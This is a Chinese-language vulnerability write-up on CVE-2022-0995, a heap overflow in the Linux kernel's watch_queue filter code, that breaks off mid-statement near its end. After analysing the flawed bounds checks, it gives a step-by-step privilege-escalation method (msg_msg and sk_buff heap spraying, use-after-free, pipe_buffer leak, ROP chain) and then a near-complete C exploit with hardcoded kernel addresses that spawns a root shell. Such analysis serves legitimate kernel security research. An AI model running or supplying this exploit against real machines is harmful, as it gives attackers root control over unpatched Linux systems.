CVE-2022-0995 Linux kernel 观测队列子系统堆溢出漏洞分析

CVE-2022-0995 Linux kernel 观测队列子系统堆溢出漏洞分析
2022-4-12 22:10:42 Author: xz.aliyun.com(查看原文) 阅读量:12 收藏

CVE-2022-0995 是近日爆出来的一个存在于 观察队列事件通知子系统（watch_queue event notification subsystem）中的一个堆溢出漏洞，该漏洞自内核版本 5.8 中伴随着 watch queue subsystem 引入，在 5.17-rc7 版本中被修复

不过虽然获得了 7.1 的 CVSS 评分，但这个漏洞似乎并没有什么热度，不过在笔者看来这仍然是一个品相不错的漏洞

在开始之前我们先来补充一些基础知识

General notification mechanism

参见https://www.kernel.org/doc/html/latest/watch_queue.html

通用通知机制 是建立在标准管道驱动之上的，其可以有效地将来自内核的通知消息拼接到用户打开的管道中，我们可以通过 CONFIG_WATCH_QUEUE 编译选项启用（默认开启）

该机制通过一个以特殊模式打开的管道实现，内核生成的消息被保存到管道内部的循环环形缓冲区中（pipe_buffer 队列），通过 read() 进行读取，由于在某些情况下我们可能想要将添加的内容还原到环上，因此在此类管道上禁用了 splice 以及类似功能（因为这可能导致其与通知消息交织在一起）

管道的所有者应当告诉内核哪些资源其想要通过该管道进行观察，只有连接到该管道上的资源才会往里边插入消息，需要注意的是一个资源可能会与多个管道绑定并同时将消息插入所有管道

若环中没有可用的插槽或可用的预分配的 message buffer（一个管道默认只有 16 个 pipe_buffer ——对应 16 张内存页），则消息将会被丢弃，在这两种情况下，read() 将在读取当前缓冲区的最后一条消息后将 WATCH_META_LOSS_NOTIFICATION 插入输出缓冲区

Watch Queue（Notification Output）API

一个 观测队列 （watch queue）是由一个应用分配的用以记录通知的缓冲区，其工作原理完全隐藏在管道设备驱动中，但有必要获得一个对其的引用以设置一个观测，可以通过以下 API 进行管理：

struct watch_queue *get_watch_queue(int fd);

由于观测队列在内核中通过实现缓冲区的管道的文件描述符表示，用户空间必须通过系统调用传递该文件描述符，这可以用于从系统调用中查找指向观测队列的不透明指针
void put_watch_queue(struct watch_queue *wqueue);

该函数用以丢弃从 get_watch_queue() 获得的引用

Event Filter

当一个观测队列被创建后，我们可以应用一组 过滤器 （filters）以限制接收的事件：

struct watch_notification_filter filter = {
        ...
};
ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter)

其中 filter 应为一个 struct watch_notification_filter 类型变量，其中 nr_filters 表示 filters[] 数组中过滤器的数量，而 __reserved 应为 0：

struct watch_notification_filter {
        __u32   nr_filters;
        __u32   __reserved;
        struct watch_notification_type_filter filters[];
};

filters[] 为一个 watch_notification_type_filter 类型的结构体数组，该结构体定义如下：

struct watch_notification_type_filter {
        __u32   type;
        __u32   info_filter;
        __u32   info_mask;
        __u32   subtype_filter[8];
};

type 为要过滤的事件类型，应当为类似 WATCH_TYPE_KEY_NOTIFY 的值
info_filter 与 info_mask 充当通知记录的信息字段的过滤器，仅在以下情况才将通知写入缓冲区：
```
(watch.info & info_mask) == info_filter
```
例如，这可以用于忽略不在一个挂载树上的观测点的事件
subtype_filter 为一个指示我们感兴趣的子类型的 bitmask，subtype_filter[0] 的 0 位对应子类型 0，1 位对应子类型 1，以此类推

若 ioctl() 的参数为 NULL，则过滤器将被移除，我们将接收到所有来自观测源的事件

内核中 watch queue subsystem 中 Event Filter 的实现

前面我们抄了一大段的 kernel document，现在我们来深入源码看一下 watch queue subsystem 的实现机制

当我们调用 ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter) 时，会调用 do_vfs_ioctl() 判断 cmd 进行处理，而我们的 IOC_WATCH_QUEUE_SET_FILTER 不在其列表中，所以最后会走到 vfs_ioctl()

SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
{
    struct fd f = fdget(fd);
    int error;

    if (!f.file)
        return -EBADF;

    error = security_file_ioctl(f.file, cmd, arg);
    if (error)
        goto out;

    error = do_vfs_ioctl(f.file, fd, cmd, arg);
    if (error == -ENOIOCTLCMD)
        error = vfs_ioctl(f.file, cmd, arg);

out:
    fdput(f);
    return error;
}

在 vfs_ioctl() 中会调用 file 结构体自身的函数表中的 unlocked_ioctl 指针

long vfs_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    int error = -ENOTTY;

    if (!filp->f_op->unlocked_ioctl)
        goto out;

    error = filp->f_op->unlocked_ioctl(filp, cmd, arg);
    if (error == -ENOIOCTLCMD)
        error = -ENOTTY;
 out:
    return error;
}
EXPORT_SYMBOL(vfs_ioctl);

那么这里我们需要将目光放回管道的创建流程中分配文件描述符的部分，存在如下调用链：

do_pipe2()
    __do_pipe_flags()
        create_pipe_files()
            alloc_file_pseudo()
                alloc_file()

alloc_file() 分配一个 file 结构体并将其函数表设为上层调用传入的函数表，而在 create_pipe_files() 中传入的函数表为 pipefifo_fops：

const struct file_operations pipefifo_fops = {
    .open       = fifo_open,
    .llseek     = no_llseek,
    .read_iter  = pipe_read,
    .write_iter = pipe_write,
    .poll       = pipe_poll,
    .unlocked_ioctl = pipe_ioctl,
    .release    = pipe_release,
    .fasync     = pipe_fasync,
    .splice_write   = iter_file_splice_write,
};

因此最终调用到的是 pipe_ioctl()，对于 cmd IOC_WATCH_QUEUE_SET_FILTER 而言，最终会调用 watch_queue_set_filter() 函数

static long pipe_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    struct pipe_inode_info *pipe = filp->private_data;
    int count, head, tail, mask;

    switch (cmd) {
    case FIONREAD:
        __pipe_lock(pipe);
        count = 0;
        head = pipe->head;
        tail = pipe->tail;
        mask = pipe->ring_size - 1;

        while (tail != head) {
            count += pipe->bufs[tail & mask].len;
            tail++;
        }
        __pipe_unlock(pipe);

        return put_user(count, (int __user *)arg);

#ifdef CONFIG_WATCH_QUEUE
    case IOC_WATCH_QUEUE_SET_SIZE: {
        int ret;
        __pipe_lock(pipe);
        ret = watch_queue_set_size(pipe, arg);
        __pipe_unlock(pipe);
        return ret;
    }

    case IOC_WATCH_QUEUE_SET_FILTER:
        return watch_queue_set_filter(
            pipe, (struct watch_notification_filter __user *)arg);
#endif

    default:
        return -ENOIOCTLCMD;
    }
}

漏洞便发生在 watch_queue_set_filter()中将 filter 数组从用户空间拷贝到内核空间的过程当中，现在让我们仔细审视这个函数的执行流程，在一开始时首先会将用户空间的 watch_notification_filter 结构拷贝到内核空间：

long watch_queue_set_filter(struct pipe_inode_info *pipe,
                struct watch_notification_filter __user *_filter)
{
    struct watch_notification_type_filter *tf;
    struct watch_notification_filter filter;
    struct watch_type_filter *q;
    struct watch_filter *wfilter;
    struct watch_queue *wqueue = pipe->watch_queue;
    int ret, nr_filter = 0, i;

    if (!wqueue)
        return -ENODEV;

    if (!_filter) {
        /* Remove the old filter */
        wfilter = NULL;
        goto set;
    }

    /* Grab the user's filter specification */
    if (copy_from_user(&filter, _filter, sizeof(filter)) != 0)
        return -EFAULT;
    if (filter.nr_filters == 0 ||
        filter.nr_filters > 16 ||
        filter.__reserved != 0)
        return -EINVAL;

之后 memdup_user() 分配一块临时空间，将用户空间的 filter 数组拷贝至该临时空间

tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));
    if (IS_ERR(tf))
        return PTR_ERR(tf);

接下来会遍历每一个 watch_notification_type_filter 结构，记录 type 在指定范围的 filter 的数量到变量 nr_filter 中，这里其判断一个 type 是否合法的范围是 sizeof(wfilter->type_filter) * 8

ret = -EINVAL;
    for (i = 0; i < filter.nr_filters; i++) {
        if ((tf[i].info_filter & ~tf[i].info_mask) ||
            tf[i].info_mask & WATCH_INFO_LENGTH)
            goto err_filter;
        /* Ignore any unknown types */
        if (tf[i].type >= sizeof(wfilter->type_filter) * 8)
            continue;
        nr_filter++;
    }

接下来会分配真正储存 filter 的的空间，这里用了一个 struct_size() 导出的大小为 sizeof(wfilter) + sizeof(filters) * nr_filter（感兴趣的同学可以自行阅读源码），注意到这里计算大小用的是我们前面遍历计算得到的 nr_filter：

/* Now we need to build the internal filter from only the relevant
     * user-specified filters.
     */
    ret = -ENOMEM;
    wfilter = kzalloc(struct_size(wfilter, filters, nr_filter), GFP_KERNEL);
    if (!wfilter)
        goto err_filter;
    wfilter->nr_filters = nr_filter;

之后是将 filter 数组拷贝到分配的空间上，我们的第一个漏洞便出现在这里，其判断 type 是否合法使用的是 sizeof(wfilter->type_filter) * BITS_PER_LONG) ，与前面 nr_filter 的计算存在不一致性：

q = wfilter->filters;
    for (i = 0; i < filter.nr_filters; i++) {
        if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
            continue;

        q->type         = tf[i].type;
        q->info_filter      = tf[i].info_filter;
        q->info_mask        = tf[i].info_mask;
        q->subtype_filter[0]    = tf[i].subtype_filter[0];
        __set_bit(q->type, wfilter->type_filter);
        q++;
    }

而 BITS_PER_LONG 定义于 /include/asm-generic/bitsperlong.h 中，在 32 位下为 32，64 位下为64：

#ifdef CONFIG_64BIT
#define BITS_PER_LONG 64
#else
#define BITS_PER_LONG 32
#endif /* CONFIG_64BIT */

那么前后对 type 范围的计算便存在不一致，我们不难想到的是我们可以指定几个 filter 的 type 为（计算 nr_filter 时的合法 type 上限值，拷贝 filter 时的合法 type 上限值）这个范围内的特定值，这样就能越界拷贝一定数量的 filter，从而完成堆上的越界写

那么这里我们容易计算得出触发第一个漏洞的 type 的范围应为 [0x80, 0x400)

而第二个漏洞则存在于上面这段代码中对 __set_bit() 的调用，该函数定义如下：

static inline void __set_bit(int nr, volatile unsigned long *addr)
{
    unsigned long mask = BIT_MASK(nr);
    unsigned long *p = ((unsigned long *)addr) + BIT_WORD(nr);

    *p  |= mask;
}

其作用便是将 addr 偏移 BIT_WORD(nr) 处的 BIT_MASK(mask) 位进行置 1 操作，这里的 BIT_WORD() 宏主要是除以 long 类型所占位数（64），而 BIT_MASK() 宏则是对 long 类型所占位数求模后结果作为 unsigned long 值 1 左移的位数导出结果数值：

#define BIT_MASK(nr)        (UL(1) << ((nr) % BITS_PER_LONG))
#define BIT_WORD(nr)        ((nr) / BITS_PER_LONG)

而传入的第一个参数刚好为 type，由于我们的 type 可以在 [0x80, 0x400) 范围内取，而分配的 filter 空间却未必有那么大，因此这里存在一个越界置 1 位的漏洞，我们可以通过设置一个较大的 type 完成堆上越界置 1 位的操作

例如对于 kmalloc-96 而言，我们的对象可以覆盖到下图所示范围（本图来自于 breezeO_o师傅的博客）：

在目前公开的 exp 中对该漏洞的利用其实是基于 __set_bit() 进行利用的，因为相较于不好控制的 filter 溢出，越界写 1 位则更方便我们控制一些指针，例如 msg_msg->m_list 双向链表

在这份公开的 exp 中使用的其实是与 CVE-2021-22555 相同的利用技巧，只不过篡改 msg_msg 头部的方式不是邻接溢出写 0，而是越界写 1；接下来笔者将使用与 CVE-2021-22555 相同的利用技巧完成对该漏洞的利用

提权

Step.I 堆喷 `msg_msg` ，建立主从消息队列，构造重叠辅助消息

现在我们有了一个堆上越界写 1 位，我们该怎么利用呢？比较朴素的一种思想便是覆写一个结构体中的指针，利用 partial overwrite 使得两个这样的结构体的头部指针指向同一个结构体，从而实现 object overlapping

那么选用什么样的结构体作为 victim 呢？这里我们选择使用 msg_msg 这一结构体，其长度可控，且开头正好是内核双向链表结构体，我们所能覆写的为其 next 指针：

/* one msg_msg structure for each message */
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;        /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

当我们在一个消息队列上发送多个消息时，会形成如下结构：

我们不难想到的是，我们可以在一开始时先创建多个消息队列，并分别在每一个消息队列上发送两条消息，形成如下内存布局，这里为了便利后续利用，第一条消息（主消息）的大小为 96，第二条消息（辅助消息）的大小为 0x400：

之后我们读出其中几个消息队列的主消息以产生空洞，再利用 ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter) 获取到我们刚释放的 msg_msg 结构体的空间

这里需要注意的是我们至少要释放两个主消息，因为在分配到 watch_filter 之前 memdup_user() 还需要获取一个对象

tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));
    if (IS_ERR(tf))
        return PTR_ERR(tf);

    //...

    /* Now we need to build the internal filter from only the relevant
     * user-specified filters.
     */
    ret = -ENOMEM;
    wfilter = kzalloc(struct_size(wfilter, filters, nr_filter), GFP_KERNEL);

对于 __set_bit() 而言其可以置 1 的范围如下图所示，刚好可以覆盖到下一相邻 object 的前 16 字节

利用越界置 1 位我们可以覆写到其相邻的主消息的 next 指针，若该位刚好被由 0 变为 1，则我们很容易构造出在两个消息队列上存在两个主消息指向同一个辅助消息的这样的局面

我们可以通过在主从消息中放置对应的值来标识喷射的不同的消息队列，遍历读取所有队列来感知指向了同一辅助消息的两个队列

利用 MSG_COPY 标志位可以读取消息队列上的消息而不释放，参见这里

Step.II 释放辅助消息，构造 UAF

此时我们将辅助消息释放掉，便能成功完成 UAF 的构建，此时我们仍能通过其中一个消息队列访问到该辅助消息对应 object，但实际上这个 object 已经在 freelist 上了

Step.III 堆喷 `sk_buff` 伪造辅助消息，泄露 UAF obj 地址

接下来我们考虑如何利用这个 UAF，因为其仍位于消息队列上所以我们考虑伪造 msg_msg 结构体进行后续的利用，这里我们选用另外一个常用来进行堆喷的结构体——sk_buff，类似于 msg_msg，其同样可以提供近乎任意大小对象的分配写入与释放，但不同的是 msg_msg 由一个 header 加上用户数据组成，而 sk_buff 本身不包含任何用户数据，用户数据单独存放在一个 object 当中，而 sk_buff 中存放指向用户数据的指针

至于这个结构体的分配与释放也是十分简单，sk_buff 在内核网络协议栈中代表一个「包」，我们不难想到的是我们只需要创建一对 socket，在上面发送与接收数据包就能完成 sk_buff 的分配与释放，最简单的办法便是用 socketpair 系统调用创建一对 socket，之后对其 read & write 便能完成收发包的工作

接下来我们考虑如何通过伪造 msg_msg 结构体完成信息泄露，我们不难想到的是可以伪造一个 msg_msg 结构体，将其 m_ts 域设为一个较大值，从而越界读取到相邻辅助消息的 header，泄露出堆上地址

我们泄露出来的是哪个地址？让我们重新将目光放回到消息队列的结构上：

我们不难知道的是，该辅助消息的 prev 指针指向其主消息，而该辅助消息的 next 指针指向该消息队列的 msg_queue 结构，这是目前我们已知的两个“堆上地址”

接下来我们伪造 msg_msg->next，将其指向我们的 UAF object 相邻的辅助消息对应的主消息头部往前，从而读出该主消息的头部，泄露出对应的辅助消息的地址，有了这个辅助消息的地址，再减去 0x400 便是我们的 UAF 对象的地址

通过伪造 msg_msg->next 可以完成任意地址读，参见这里

Step.IV 堆喷 `pipe_buffer`，泄露内核基址

现在我们已知了可控区域的地址，接下来让我们来考虑泄露内核 .text 段的基址，以及如何劫持 RIP 完成提权

之前我们为什么将辅助消息的大小设为 0x400？除了方便对齐以外，还有一层考虑就是这个大小刚好有一个十分实用的结构体 pipe_buffer 数组，既能帮我们泄露内核代码段基址，也能帮我们劫持 RIP

当我们创建一个管道时，在内核中会生成数个连续的 pipe_buffer 结构体，申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object

/**
 *  struct pipe_buffer - a linux kernel pipe buffer
 *  @page: the page containing the data for the pipe buffer
 *  @offset: offset of data inside the @page
 *  @len: length of data inside the @page
 *  @ops: operations associated with this buffer. See @pipe_buf_operations.
 *  @flags: pipe buffer flags. See above.
 *  @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

在 pipe_buffer 中存在一个函数表成员 pipe_buf_operations ，其指向内核中的函数表 anon_pipe_buf_ops，若我们能够将其读出，便能泄露出内核基址，操作如下：

利用 sk_buff 修复辅助消息，之后从消息队列中接收该辅助消息，此时该 object 重回 slub 中，但 sk_buff 仍指向该 object
喷射 pipe_buffer，之后再接收 sk_buff 数据包，我们便能读出 pipe_buffer 上数据，泄露内核基址

Step.V 伪造 pipe_buffer，构造 ROP，劫持 RIP，完成提权

当我们关闭了管道的两端时，会触发 pipe_buffer->pipe_buffer_operations->release 这一指针，而 UAF object 的地址对我们而言是已知的，因此我们可以直接利用 sk_buff 在 UAF object 上伪造函数表与构造 ROP chain，再选一条足够合适的 gadget 完成栈迁移便能劫持 RIP 完成提权

Final EXPLOIT

最终的 exp 如下（基本上就是把 CVE-2021-22555 的 exp 里 trigger oob 的函数改一下就能打通了）：

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <linux/watch_queue.h>
#include <sys/syscall.h>

#define PRIMARY_MSG_SIZE 96
#define SECONDARY_MSG_SIZE 0x400

#define PRIMARY_MSG_TYPE    0x41
#define SECONDARY_MSG_TYPE  0x42
#define VICTIM_MSG_TYPE     0x1337
#define MSG_TAG     0xAAAAAAAA

#define SOCKET_NUM 16
#define SK_BUFF_NUM 128
#define PIPE_NUM 256
#define MSG_QUEUE_NUM 4096

#define ANON_PIPE_BUF_OPS 0xffffffff82076500
#define PREPARE_KERNEL_CRED 0xffffffff810d1350
#define INIT_CRED 0xffffffff82a63be0
#define COMMIT_CREDS 0xffffffff810d0ec0
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81c00f30
#define POP_RDI_RET 0xffffffff810310a3

size_t user_cs, user_ss, user_sp, user_rflags;

void saveStatus()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

struct list_head
{
    uint64_t    next;
    uint64_t    prev;
};

struct msg_msg
{
    struct list_head m_list;
    uint64_t    m_type;
    uint64_t    m_ts;
    uint64_t    next;
    uint64_t    security;
};

struct msg_msgseg
{
    uint64_t    next;
};

struct 
{
    long mtype;
    char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
}primary_msg;

struct 
{
    long mtype;
    char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
}secondary_msg;

/*
 * skb_shared_info need to take 320 bytes at the tail
 * so the max size of buf we should send is:
 * 1024 - 320 = 704
 */
char fake_secondary_msg[704];

struct
{
    long mtype;
    char mtext[0x1000 - sizeof(struct msg_msg) + 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

struct pipe_buffer
{
    uint64_t    page;
    uint32_t    offset, len;
    uint64_t    ops;
    uint32_t    flags;
    uint32_t    padding;
    uint64_t    private;
};

struct pipe_buf_operations
{
    uint64_t    confirm;
    uint64_t    release;
    uint64_t    try_steal;
    uint64_t    get;
};

void errExit(char *msg)
{
    printf("\033[31m\033[1m[x] Error: %s\033[0m\n", msg);
    exit(EXIT_FAILURE);
}

int readMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0);
}

int writeMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    *(long*)msgp = msgtyp;
    return msgsnd(msqid, msgp, msgsz - sizeof(long), 0);
}

int peekMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, MSG_COPY | IPC_NOWAIT);
}

void buildMsg(struct msg_msg *msg, uint64_t m_list_next,
    uint64_t m_list_prev, uint64_t m_type, uint64_t m_ts, 
    uint64_t next, uint64_t security)
{
    msg->m_list.next = m_list_next;
    msg->m_list.prev = m_list_prev;
    msg->m_type = m_type;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = security;
}

int spraySkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int i = 0; i < SOCKET_NUM; i++)
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            // printf("[-] now %d, num %d\n", i, j);
            if (write(sk_socket[i][0], buf, size) < 0)
                return -1;
        }
    return 0;
}

int freeSkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int i = 0; i < SOCKET_NUM; i++)
        for (int j = 0; j < SK_BUFF_NUM; j++)
            if (read(sk_socket[i][1], buf, size) < 0)
                return -1;
    return 0;
}

void trigerOutOfBoundWrite(int pipe_fd[2])
{
    struct watch_notification_filter *wfilter;
    unsigned int nfilters;

    nfilters = 4;
    wfilter = (struct watch_notification_filter*)
            calloc(1, sizeof(struct watch_notification_filter)
                + nfilters * sizeof(struct watch_notification_type_filter));
    wfilter->nr_filters = nfilters;

    // normal filter
    for (int i = 0; i < (nfilters - 1); i++)
        wfilter->filters[i].type = 1;

    // evil filter
    // 0x300 = 64 * 12, 12 * 8 = 96bytes
    // 1 << 0xa = 1024, maybe we can hit a proper bit
    wfilter->filters[nfilters - 1].type = 0x30a;

    // triger oob write
    if (ioctl(pipe_fd[0], IOC_WATCH_QUEUE_SET_FILTER, wfilter) < 0)
        errExit("failed to ioctl IOC_WATCH_QUEUE_SET_FILTER!");

    // prevent memory leak in userspace(no need in fact)
    free(wfilter);
}

void getRootShell(void)
{
    if (getuid())
        errExit("failed to gain the root!");

    printf("\033[32m\033[1m[+] Succesfully gain the root privilege, trigerring root shell now...\033[0m\n");
    system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
    int         oob_pipe_fd[2];
    int         sk_sockets[SOCKET_NUM][2];
    int         pipe_fd[PIPE_NUM][2];
    int         msqid[MSG_QUEUE_NUM];
    int         victim_qid, real_qid;
    struct msg_msg  *nearby_msg;
    struct msg_msg  *nearby_msg_prim;
    struct pipe_buffer *pipe_buf_ptr;
    struct pipe_buf_operations *ops_ptr;
    uint64_t    victim_addr;
    uint64_t    kernel_base;
    uint64_t    kernel_offset;
    uint64_t    *rop_chain;
    int         rop_idx;
    cpu_set_t   cpu_set;

    saveStatus();

    /*
     * Step.O
     * Initialization
     */
    puts("\033[32m\033[1m[+] CVE-2022-0995 Linux Privilege Escalation.\033[0m");

    // run the exp on specific core only
    CPU_ZERO(&cpu_set);
    CPU_SET(0, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    // pipe to trigert off-by-null
    if (pipe2(oob_pipe_fd, O_NOTIFICATION_PIPE) < 0)
        errExit("failed to create O_NOTIFICATION_PIPE!");

    // socket pairs to spray sk_buff
    for (int i = 0; i < SOCKET_NUM; i++)
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]) < 0)
            errExit("failed to create socket pair!");

    /*
     * Step.I
     * build msg_queue, spray primary and secondary msg_msg,
     * and use OOB write to construct the overlapping
     */
    puts("\n\033[34m\033[1m[*] Step.I spray msg_msg, construct overlapping object\033[0m");

    puts("[*] Build message queue...");
    // build 4096 message queue
    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
            errExit("failed to create msg_queue!");
    }

    puts("[*] Spray primary and secondary msg_msg...");

    memset(&primary_msg, 0, sizeof(primary_msg));
    memset(&secondary_msg, 0, sizeof(secondary_msg));

    // spray primary and secondary message
    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        *(int *)&primary_msg.mtext[0] = MSG_TAG;
        *(int *)&primary_msg.mtext[4] = i;
        if (writeMsg(msqid[i], &primary_msg, 
                sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
            errExit("failed to send primary msg!");

        *(int *)&secondary_msg.mtext[0] = MSG_TAG;
        *(int *)&secondary_msg.mtext[4] = i;
        if (writeMsg(msqid[i], &secondary_msg, 
                sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
            errExit("failed to send secondary msg!");
    }

    // create hole in primary msg_msg
    puts("[*] Create holes in primary msg_msg...");
    for (int i = 0; i < MSG_QUEUE_NUM; i += 1024)
    {
        if (readMsg(msqid[i], &primary_msg, 
                sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
            errExit("failed to receive primary msg!");
    }

    // triger off-by-null on primary msg_msg
    puts("[*] Trigger OOB write to construct the overlapping...");
    trigerOutOfBoundWrite(oob_pipe_fd);

    // find the queues that have the same secondary msg_msg
    puts("[*] Checking whether succeeded to make overlapping...");
    victim_qid = real_qid = -1;
    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        if ((i % 1024) == 0)  // the hole
            continue;

        if (peekMsg(msqid[i], &secondary_msg, 
                sizeof(secondary_msg), 1) < 0)
        {
            printf("[x] error qid: %d\n", i);
            errExit("failed to receive secondary msg!");
        }

        if (*(int*) &secondary_msg.mtext[0] != MSG_TAG)
            errExit("failed to make corruption!");

        if (*(int*) &secondary_msg.mtext[4] != i)
        {
            victim_qid = i;
            real_qid = *(int*) &secondary_msg.mtext[4];
            break;
        }
    }

    if (victim_qid < 0)
        errExit("failed to make overlapping!");

    printf("\033[32m\033[1m[+] victim qid:\033[0m %d \033[32m\033[1m real qid: \033[0m %d\n", 
            victim_qid, real_qid);

    /*
     * Step.II
     * construct UAF
     */
    puts("\n\033[34m\033[1m[*] Step.II construct UAF\033[0m");

    // free the victim secondary msg_msg, then we get a UAF
    if (readMsg(msqid[real_qid], &secondary_msg, 
                sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
        errExit("failed to receive secondary msg!");

    puts("\033[32m\033[1m[+] UAF construction complete!\033[0m");

    /*
     * Step.III
     * spray sk_buff to leak msg_msg addr
     * construct fake msg_msg to leak addr of UAF obj
     */
    puts("\n\033[34m\033[1m[*] Step.III spray sk_buff to leak kheap addr\033[0m");

    // spray sk_buff to construct fake msg_msg
    puts("[*] spray sk_buff...");
    buildMsg((struct msg_msg *)fake_secondary_msg, 
            *(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3", 
            VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
    if (spraySkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to spray sk_buff!");

    // use fake msg_msg to read OOB
    puts("[*] OOB read from victim msg_msg");
    if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
        errExit("failed to read victim msg!");

    if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE] != MSG_TAG)
        errExit("failed to rehit the UAF object!");

    nearby_msg = (struct msg_msg*) 
            &oob_msg.mtext[(SECONDARY_MSG_SIZE) - sizeof(struct msg_msg)];

    printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m%llx\n", 
            nearby_msg->m_list.prev);

    // release and re-spray sk_buff to construct fake msg_msg
    // so that we can make an arbitrary read on a primary msg_msg
    if (freeSkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to release sk_buff!");

    buildMsg((struct msg_msg *)fake_secondary_msg, 
            *(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3", 
            VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), 
            nearby_msg->m_list.prev - 8, 0);
    if (spraySkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to spray sk_buff!");

    puts("[*] arbitrary read on primary msg of msg nearby victim");
    if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
        errExit("failed to read victim msg!");

    if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
        errExit("failed to rehit the UAF object!");

    // cal the addr of UAF obj by the header we just read out
    nearby_msg_prim = (struct msg_msg*) 
            &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
    victim_addr = nearby_msg_prim->m_list.next - 0x400;

    printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m%llx\n", 
            nearby_msg_prim->m_list.next);
    printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m%llx\n", victim_addr);

    /*
     * Step.IV
     * fix the header of UAF obj and release it
     * spray pipe_buffer and leak the kernel base
     */
    puts("\n\033[34m\033[1m[*] Step.IV spray pipe_buffer to leak kernel base\033[0m");

    // re-construct the msg_msg to fix it
    puts("[*] fixing the UAF obj as a msg_msg...");
    if (freeSkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to release sk_buff!");

    memset(fake_secondary_msg, 0, sizeof(fake_secondary_msg));
    buildMsg((struct msg_msg *)fake_secondary_msg, 
            victim_addr + 0x800, victim_addr + 0x800, // a valid kheap addr is valid
            VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 
            0, 0);
    if (spraySkBuff(sk_sockets, fake_secondary_msg, 
            sizeof(fake_secondary_msg)) < 0)
        errExit("failed to spray sk_buff!");

    // release UAF obj as secondary msg
    puts("[*] release UAF obj in message queue...");
    if (readMsg(msqid[victim_qid], &secondary_msg, 
                sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
        errExit("failed to receive secondary msg!");

    // spray pipe_buffer
    puts("[*] spray pipe_buffer...");
    for (int i = 0; i < PIPE_NUM; i++)
    {
        if (pipe(pipe_fd[i]) < 0)
            errExit("failed to create pipe!");

        // write something to activate it
        if (write(pipe_fd[i][1], "arttnba3", 8) < 0)
            errExit("failed to write the pipe!");
    }

    // release the sk_buff to read pipe_buffer, leak kernel base
    puts("[*] release sk_buff to read pipe_buffer...");
    pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (read(sk_sockets[i][1], &fake_secondary_msg, 
                    sizeof(fake_secondary_msg)) < 0)
                errExit("failed to release sk_buff!");

            if (pipe_buf_ptr->ops > 0xffffffff81000000)
            {
                printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%llx\n", 
